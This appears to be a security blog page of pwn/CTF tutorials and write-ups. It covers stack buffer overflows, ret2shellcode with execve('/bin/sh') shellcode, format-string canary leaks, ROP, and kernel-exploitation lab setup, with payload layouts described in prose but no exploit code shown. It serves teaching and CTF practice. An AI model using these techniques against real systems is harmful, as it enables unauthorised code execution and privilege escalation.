Search This Blog

Saturday, February 24, 2024

[pwn-primer] understanding ret2shellcode + understanding stack based buffer overflow

This post is going to cover an essential pwn technique called ret2shellcode or is commonly referred to as Shellcode Injection. In a typical pwn challenge (especially if it's easy), we'll have a win() function to redirect program execution to in order to solve the challenge. However, there are instances where there is no win function. This is when this technique comes in.

Shellcode, in essence, are assembly instructions that can execute arbitrary commands. In real exploits, they're used to either spawn a shell (either root/admin or low privilege) or execute commands like display contents of a critical file. In the case of pwn CTF challenges, their used to spawn a root shell to get the flag on the remote server or to display the contents of flag.txt. 

I'll go over a simple program that can be exploited with the use of shellcode.


The program above is quite simple in nature. It just has a main function that defines a character buffer on the stack of 256 bytes. After a printf call is made displaying the address in memory of where the buffer_one character buffer is located. After, a gets call is made into the buffer_one buffer.

Guess this is a good time to explain the vulnerability.

The vulnerability in this program here is found at the gets call. Why? Because we see the buffer_one character buffer has been given a length of 256 bytes on the stack. However, the gets call here asks for user input. The vulnerability lies in the fact that the gets() call does not make sure that exactly 256 bytes have been written to that buffer. The user input can exceed 256 bytes, thus accessing arbitrary memory locations. 

All this is occuring in a data structure in memory called the stack. Every function in C programs, at runtime, is initialized with a stack (or sometimes refered to as a stack frame). These stack frame hold the local variables of the functions they are defined in. For example, in the program above, there is one stack frame for the 'main' function and the character buffer is considered to be 'local' to the main function stack frame. This data structure operates using PUSH and POP operations. These PUSH and POP instructions PUSH data onto the stack and POP data off of the stack. 

A buffer overflow vulnerability can occur on the stack or on another data structure that deals with dynamically allocating space in memory called the heap, but for this post we will focus on the stack. A stack overflow vulnerability in this case means we can overwrite past the specified buffer size, accessing other important sections on the stack, such as other local variables, the base pointer and even one other important register, the saved return address.

On the stack, the return address is essentially an address that points to where execution is supposed to be redirected to once that respective function has finished execution. By overwriting this saved return address with an address of our own, we can redirect execution to whatever we want. 

Let's go back to the program and see this in action. 

After compiling the program in gcc, we see the program output once executed. 


As seen in the source code, the program outputs the address of where the stack is in memory. The next line shows an empty space, symbolizing a hang. This is where the gets() call is being initiated. By inserting more than 256 bytes, the program should crash. A crash in the program confirms the presence of the buffer overflow vulnerability. 


Junk bytes inserted into the program results in a segmentation fault. The program has crashed and the vulnerability is confirmed. There's no win function to redirect execution to, as discussed before and shellcode will have to be used. pwntools is a python based library that assists with exploit script writing. This library hosts a host of shellcode to perform different operations across different architectures. In our case, we're working with a 64 bit program, so the shellcode assembly instructions will be 64 bit.

execve('/bin/sh') syscall shellcode


the shellcode above execute an execve syscall that executes the path '/bin/sh' as the parameter to spawn a shell. If you're not well versed in how 64 bit functions and parameters are placed in assembly, then I recommend you get yourself informed on that. The first 4 instructions push the string '/bin/sh' represented by 0x732f2f2f6e69622f onto the stack and finally inserts it into rdi. The following instructions perform XOR and stack PUSH POP operations and ultimately calls execve().

Final Exploit Script


exploit script is quite simple. most of it is utilizing pwntools methods. I can't overemphasize how easy pwntools has made writing exploits. All the script does is use the shellcraft.sh(), which is the equivalent to the execve syscall we saw above, except in this instance is accessible through shellcraft.sh(). After the next section simply takes the outputted stack address and converts it to base 16, which is hexadecimal and prints that out to the screen. Lastly, the real payload is organised in order. 256 bytes of capital A's (junk bytes) and appends the shellcode to it to fill the buffer_one buffer on the stack, fill the rbp register with more junk bytes (0xcafebabe) and finally point rip to the buffer address where the stack is located. This basically inserts the shellcode onto the stack, and ultimately redirects execution to where the shellcode has been injected, ultimately executing our own code. 

the exploit ran and we can see we have shell. Quite a simple technique. I'm sure i butchered some of the explanation but essentially this is how shellcode works. We inject it onto the stack of a vulnerable process and have execution point to where the shellcode is injected to.


Thursday, February 22, 2024

[pwn primer] understanding format string vulnerabilities + bypassing stack canary protection

Previously, we've covered techniques like ret2shellcode, which involves injecting shellcode into a vulnerable process to ultimately execute whatever code we want and the use of ROP gadgets, which is ultimately a code reuse attack. We use the code located within the vulnerable program, specifically assembly instructions ending with the 'ret' instruction, to setup the stack to in turn execute whatever code we want, bypassing the Non executable bit that prevents us from injecting shellcode onto the stack and have it execute. 

Another exploitation technique is the use of format string exploits. This technique involves exploiting format specifiers in C. Manipulating format strings in C can basically allow one to read and write from arbitrary memory locations. I've created a reasonably easy C program that's vulnerable to format string vuln. Let's have a look at it and take it from there.



the main function calls vuln, which initializes a buffer on the stack of 64 bytes. after a couple of puts and gets calls are made. puts just outputs predefined text onto the screen and gets is the vulnerable function, vulnerable specifically to a buffer overflow (read man pages to see dangers of using gets). To cut the story short, gets() basically prompts for user input, without providing any bounds checking on how much input is being inserted. 

the format string vulnerability can be spotted on line 13. the printf function in C usually requires a format specifier, specifying how printf should "print" data onto the screen. these specifiers can be seen as %d for decimal, %s for strings etc (more can be found online). in this case, the code does not tell printf how to print the data, hence showing the presence of the vulnerability. We can feed printf any specifier we want and see what contents are spewed from the program.

How does this vulnerability benefit anyone? I'll show you how.

The format string vulnerability can be used to either read or write from arbitrary areas in memory. This can serve useful to us in instances where certain exploitation mitigations such as ASLR or stack canaries need to be bypassed. This post will also go into actually compiling and exploiting the vulnerable program above. This program mimics an easy/medium pwn challenge. Looking at the code overall, we also see a win() function, so this also shows that this is more of a ret2win type of challenge. 

p.s ret2win basically just means that the vulnerable pwn challenge contains a 'win' function that program execution needs to be redirected to, in order to solve the challenge. the 'win' function isnt called initally. that's why the program execution needs to be redirected to that function (usually done when there's a buffer overflow vuln).

The code above can be compiled using the flags in the commented section (one for 32 bit and 64 bit). This demo will look into x64 bit.

After compiling the program, let's have a look at the binary protections and see what exploit mitigations are enabled to have a feel on what we're dealing with.


We have 2 protections enabled. a stack canary and NX bit. The NX bit, we've already discussed. it basically just renders shellcode injections useless as the stack is non executable. cool. but the stack canary is what we haven't covered... and I'd like to do that now.

The stack canary is simply a random value placed on the stack meant to prevent buffer overflows from being successful. Specifically, it is a random value that starts with '/x00' placed at rbp-0x8 (8 bytes before the base pointer in x64). To give more clarity on this, let's have a look at the vulnerable program in a disassembler and see the main function disassembled and see how the canary is initialised.


A quick IDA inspection shows the execution branches of the vuln function where most of the program functionality is. the function prologue at the very beginning shows how 50h bytes have been reserved for this current function on the stack, right after that we see fs:28h being moved into the rax register, and then that value being inserted into a memory location located at rbp+0x8. This is the stack canary being initialised. In gdb, the location is actually at rbp-0x8 instead of rbp+0x8 so it just depends on where you look at it. 

At the end, we see the stack canary being compared with what is on the stack. if the user input overwrited rbp-0x8 or rbp+0x8, and whatever is being written at that area in memory does not equate to the random value assigned by the program at runtime, then the __stack_chk_fail will be called, showing that a buffer overflow has been attempted and the program will exit. 

That's how a stack canary works. 

Since the program has initialized a random value at rbp-0x8, then we need to find a way to use the format string vuln to leak the canary value from the stack, as that will be the mechanism with which the canary protection can be bypassed in this instance. Besides this, you can bruteforce the canary byte by byte, but right now the format string can allow us to leak it directly from the stack.

by inserting %p into the program, we can leak the contents of the stack to stdout, and it turns out that the canary can be found at the 15th position of %p inserted into the program.



since the canary starts with '/x00' as stated earlier, we know that this is the canary. It is shown this way in the leak because of endianness. Least significant byte to be more precise. However, the canary changes with every execution to ASLR being enabled on my system, so the final exploit script will automate this process and make it cleaner. Aside from that, this is how the format string vuln can be used. This is an essential pwn technique and can get a lot more advanced than this. This is as basic as it gets.

The final exploit payload will be the padding + canary_leak + additional 8 bytes to overwrite rbp + address to win function (overwrite rip address with win function)

Final Exploit Script



The exploit script is quite small, but all it will do is exploit the format string vuln to leak the canary to ultimately bypass it. As seen above, once the exploit script is ran, it leaks the canary when the script executes the vulnerable process and shows us the message "you win" signifying that we've successfully redirected execution to the win() function.

Hopefully this gave a bit more light as to how the format string works. This vulnerability can be discovered and used in other ways not mentioned here, but this is enough to serve as a primer to beginners or intermediate pwners who want to up their game up with pwning. Learning the art of pwn requires knowledge of reversing, which is a topic worthy of being discussed in another blog post I will do in future. 

More resources:

pwn.college - Hacking platform maintained by Arizona State University. They also host lectures available on twitch and youtube. Highly recommended for beginner pwners.

CTF-Wiki - Overall CTF wiki teaching basics of pwn as well as other hacking challenges like Crypto, Web and Forensics. Highly Recommended (Translate page to English as its originally compiled in Mandarin)










Saturday, February 17, 2024

[pwnable_tw - pwn] start (100 pts)

This pwn challenge is quite easy. got nervous at first but eventually got it. challenge provides a netcat IP and port to connect to, to run the exploit script against as well as the 32 bit binary that's running on that port for local debugging. so, let's look at the binary.



Challenge has every protection disabled which just indicates any shellcode injection into the challenge process will work as the stack is executable. Running the binary just asks for user input and simply exits after input is given. Let's look at what's happening under the hood.

The binary is stripped so the symbols are not present for us to see. However a entry function is present in the disassembly.


entry0() function does a few things:

- pushes esp and _exit onto the stack

- performs xor operations on eax, ebx, ecx and edx (which basically zeroes out these registers)

- pushes a total of 20 bytes onto the stack (which turns out to be the "Let's start the CTF:" string the binary outputs when it executes)

- calls write() syscall (represented by mov bl, 1 instruction)

- calls read() syscall (represented by mov al, 4 instruction) and recieves input of 60 bytes in length

- Adds 20 bytes of address in esp

- finally a 'ret' instruction is called, with eip pointing to _exit() function (0x804809d = _exit() address)


To exploit the challenge, a couple of things need to be done. Firstly, we need to utilise the buffer overflow vuln to have eip control to eventually leak the stack address. since NX bit is disabled, shellcode injection into challenge process is viable, with a twist. usually a 'jmp esp, instruction would be used to have program execution jump to the injected shellcode as its located on the stack when its injected. However, the 'jmp esp' gadget is not in the binary so another gadget has to be used to perform the same thing, to leak the stack address.


The gadget above is actually similar to the instructions within the entry binary, specifically from the ret instruction, backwards to the mov ecx, esp. If analyzed carefully, this sets up eip to point to the state in the program before sys_read syscall is invoked (state of program before sys_read = 0x08048086 approx., sys_read call invokation = 0x08048087)


the payload = padding (input buffer to eip_control offset) + stack address + length of the padding + shellcode. As seen above, padding, which is user input starts at esp + 0 which is the offset pointing to the top of the stack. shellcode was extracted from shellstorm website.

Normally the padding would be a bunch of 0x41(A) until eip control but utilising a NOP sled (bunch of 0x90 instructions that do nothing) yielded a more successful result.

Final exploit script





pwned.

 


Tuesday, February 6, 2024

[imaginaryCTF - pwn] roppy (75 pts)

Hi. back with another writeup for the imaginaryCTF 'roppy' pwn challenge. This challenge is old but still a good one to brush up on basic pwning.

Challenge description:


Challenge description shows that it's just another rop challenge. means that the stack protection NX is probably enabled. we can run checksec on the binary to confirm the suspicion:


As suspected, NX is disabled. So ret2shellcode attack won't work. User input to saved return address (RIP) control is 72 bytes. This can be calculated by creating cyclic paattern of 100 bytes, insert binary into pwndbg (gdb extension), and calculate offset with 'cyclic -l'


next, we jump to the middle of the main function to execute system(/bin/sh) to finally get shell. Can find the address of the middle of the main function in gdb.

Exploit script.




exploit script works. we get shell! 


Saturday, February 3, 2024

Kernel pwn basics for CTF - GETTING MY HANDS DIRTY (Part 1) -- [hxpctf 2020 'kernel-rop']

For a while, i've been keen to try and learn about kernel pwn. Kernel pwn or Linux kernel exploitation is essentially vulnerability research and exploitation of the Linux kernel. This includes source code auditing to understand program behaviour, debugging & fuzzing for dynamic analysis, vulnerability discovery and exploit development. I'm writing this not having a 360 degree full-fledged understanding of Kernel pwn, but writing this so drill in the info in my head first, and then in yours (hopefully!). This used to look like such a strange and elite type of knowledge but since I've immersed myself a bit into it and just generally got my feet wet, It would'nt be so bad to share the one or two things I've learnt.
If you don't know what a Kernel is, then let this serve as a chilled way to start. The Kernel is hands down the most important part of a computer. It goes as far as handling all the communication between hardware and software in a system as well as manage all the syscalls (system calls) that the system needs to execute just for it to run well and smooth without any issues. Since this is particularly important, and you know this blog is all about hacking and learning more about computer security, then you already know what time it is!

I'm going to be diving in to kernel pwn and understanding all the exploit techniques used as well as how to bypass the relevant mitigations. Keep in mind that this series will be split up into different posts so get your mind ready for that too. As opposed to userland pwn, this series will be somewhat of an advanced topic, especially with regards to the background knowledge so just keep that in mind. Obviously, hacking into a system you have no permission to can result in serious repercussions that can potentially ruin your future in an instant, so I will preface this post with this:

***DO NOT HACK INTO A SYSTEM YOU HAVE NO EXPLICIT PERMISSION TO. IT IS ILLEGAL AND ENGAGING IN SUCH WILL LAND YOU IN JAIL. 

Got it? cool.

Let's start off.

In Linux, there are different types of kernel modules. There are 'char', 'block' and 'network' kernel modules and usually end with .ko extension (which stands for kernel object), while originally are written in C. 

In a typical kernel pwn CTF challenge, the task is essentially to achieve local privilege escalation by exploiting a vulnerable kernel module which is installed on boot. It is actually quite similar to userland pwn (normal pwnable binaries), except to what I know and seen, userland pwn exploit scripts are written in python but kernel pwn exploits are written in C. 

To go in depth, i'll go over the kernel-rop CTF challenge, that deals with how a typical linux kernel pwn challenge would look like and go over ways I've learnt to approach these challenges. Let's have a look at some key challenge files that we will be focusing on.


There are quite a bit of files here, but the following are the most important for qemu to use for emulation of the challenge:

vmlinuz - This is the actual linux kernel, except it has been compressed to make the size of the file smaller (sometimes, it is also named bzImage.

initramfs.cpio.gz - This is the linux file system (compressed with gzip and cpio) where the /bin, /etc and many other important linux file directories are found. The vulnerable kernel module is also located somewhere in the file system as well.

run.sh - This shell script actually contains the qemu boot configuration. (qemu is simply just a system emulation tool)

Now that we're aware of the important files needed to take on the challenge, the next thing we have to do is to use the extract-image.sh script, to extract the kernel ELF File (yes, the linux kernel is an ELF executable file). We do this because, as the name of the challenge assumes, "kernel-rop", we will be dealing with ROP chains, just as we would when exploiting userland pwn challenges. we can use the following command to extract the kernel ELF file like so:

Now that we have the kernel ELF file extracted into the name 'vmlinux', the next thing we have to do is to extract all the ROP Gadgets from kernel ELF file. If you're not caught up to speed with what ROP gadgets are then i'll do you a favour and give an overview. ROP gadgets are gadgets located within an ELF file, assembly instructions specifically that end with a RET instruction. ROP gadgets can be used within an exploit payload to setup the stack in such a way to achieve code execution, especially if the non-executable bit is enabled. 

since the Kernel ELF file is quite big, ill execute this command to extract all the ROP Gadgets:



p.s make sure you have ROPGadget installed or even ropper as well. Like i said, the kernel ELF file is a big boy so i'll leave this to run in the background. Could take a good while. 

Now we deal with the compressed initramfs file which contains the linux file system. To have the entire file system exposed to us we have to make use of the decompress.sh script. Let's go into it deeper.




Thes script basically creates a new directory called initramfs, navigates to it, copy the initramfs.cpio.gz in the previous directory into the current working directory, uses gunzip & cpio to extract with gunzip and cpio. Let's quickly run the script.


The result of decompress.sh file. It has extracted the file system and here we see an interesting file called 'hackme.ko'. That is because that is the vulnerable module we are to exploit. 

When we run the decompress.sh script, we do it, not only to have a hold of the vulnerable kernel module to analyze, but also to do a file modification that will be very important. firstly, we will have a look at what exactly this file is.


within the /etc directory in the file system is the inittab file. This file basically tells us that when we finally run the run.sh qemu boot script, it sets the user ID and group ID to 1000 instead of 0. we cannot proceed with debugging the kernel. So we have to change the 1000 to 0 to achieve the capability to boot the kernel in qemu as root to enable debugging and overall supply ease to the exploitation process. Like so:

setuidgid from '1000' to '0'

Once this is done, we just have to use the compress.sh to recompress it to save the configurations before booting it with qemu.


Compressed. 

the run.sh script (qemu)

Now that we have that done, before I round up, let's look at the run.sh script.



some of these flags get all the info we need to get started with the challenge.

-m -> This is showing the memory size
-kernel -> This specifies the compressed kernel image
-initrd -> specifies the local file system.
- the script also contains protective cases like kaslr, smep and smap, which are exploitation mitigations enabled when the image boots up when we finally run the script.

So we've gone through a good number of things to setup the environment to finally get pwning the kernel. Remember, I am no pro at this. i just have a fundamental understanding of userspace pwn challenges that's helped me along the time I've been actively engaging in pwn ctf challenges enough to have got me started. In the next blog post, we'll go into actually running the run.sh qemu shell script, attaching the challenge to gdb as well as doing some reversing and establishing the attack strategy.